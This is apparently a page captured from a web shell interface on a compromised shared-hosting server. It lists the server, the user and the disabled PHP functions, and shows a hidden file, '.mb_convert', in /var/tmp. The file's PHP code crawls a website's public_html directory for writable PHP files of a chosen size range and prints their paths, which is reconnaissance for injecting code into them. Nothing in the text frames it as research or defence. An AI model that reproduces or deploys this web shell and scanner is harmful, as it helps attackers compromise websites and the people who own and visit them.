HEX
Server: LiteSpeed
System: Linux us-bos-web1978.main-hosting.eu 5.14.0-611.27.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 4 04:40:11 EST 2026 x86_64
User: u773298991 (773298991)
PHP: 8.3.30
Disabled: system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Upload Files
File: //proc/self/root/var/tmp/.mb_convert
<?php   $min = (int)512; $max = (int)100000; if ($min < 1) {     $min = 1; } if ($max < $min) {     $max = $min; }  function scan_sized($path, $root, $min, $max) {     if ($dir = @opendir($path)) {         while (false !== ($file = readdir($dir))) {             $p = $path . '/' . $file;             if ($file != '.' && $file != '..') {                 if (is_link($p)) {                     continue;                 } elseif (is_file($p) && substr($p, -4) == '.php' && is_writeable($p)) {                     $sz = @filesize($p);                     if ($sz === false || $sz < $min || $sz > $max) {                         continue;                     }                     $res = str_replace($root, '', $p);                     print "<f>{$res}|{$sz}</f>";                 } elseif (is_dir($p)) {                     scan_sized($p, $root, $min, $max);                 }             }         }     } }  $r = "/home/u773298991/domains/americanfilters.ai/public_html"; scan_sized($r, $r, $min, $max); die('!ended!');